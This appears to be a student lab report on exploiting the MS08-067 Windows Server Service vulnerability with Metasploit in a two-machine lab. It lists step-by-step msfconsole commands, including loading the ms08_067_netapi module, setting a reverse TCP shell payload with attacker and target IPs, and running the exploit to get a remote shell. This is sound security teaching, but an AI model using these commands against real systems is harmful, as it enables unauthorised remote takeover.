2017-2018-2 20179205 "Network Attack and Defense Technology and Practice" Windows Attack Experiment

Windows Attack Experiment

Experiment description:

Use Metaspoit to attack MS08-067, and submit screenshots (no less than five) of the process of getting the remote shell correctly.

MS08-067 Vulnerability Introduction

  The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and there are already worms that exploit this vulnerability.

experimental tool

The attack aircraft used in this experiment is kali, and the target aircraft is Win2kServer

攻击机:192.168.92.147
靶机:192.168.92.148

Experimental steps:

1. First, the attack aircraft and the target aircraft ping each other, and open msfconsole in the kali terminal

2. Check whether there is a ms08_067 vulnerability, check the returned information, and the found penetration module will be displayed

3. Enter the command use exploit/windows/smb/ms08_067_netapi to enter the exploit module. Then you can enter some commands to display some information, such as:

输入show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

输入show targets会显示出可以被攻击的靶机的操作系统型号

4. Enter show options to display the data we need to set before attacking

5. Set the address of the attack aircraft and target aircraft, and use the command show options to view the payload status again

输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.147;
输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.148;

6. Enter the command exploit to start the attack, the following picture shows the successful result of the normal attack

7. Check the IP addresses of the attacking machine and the target machine respectively, enter ipconfig/all, and find that the results are the same

8. Enter the "netstat -a" command to see which ports are opened by the target machine

9. Enter the "netstat -n" command to view the network connection of the target port

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324548430&siteId=291194637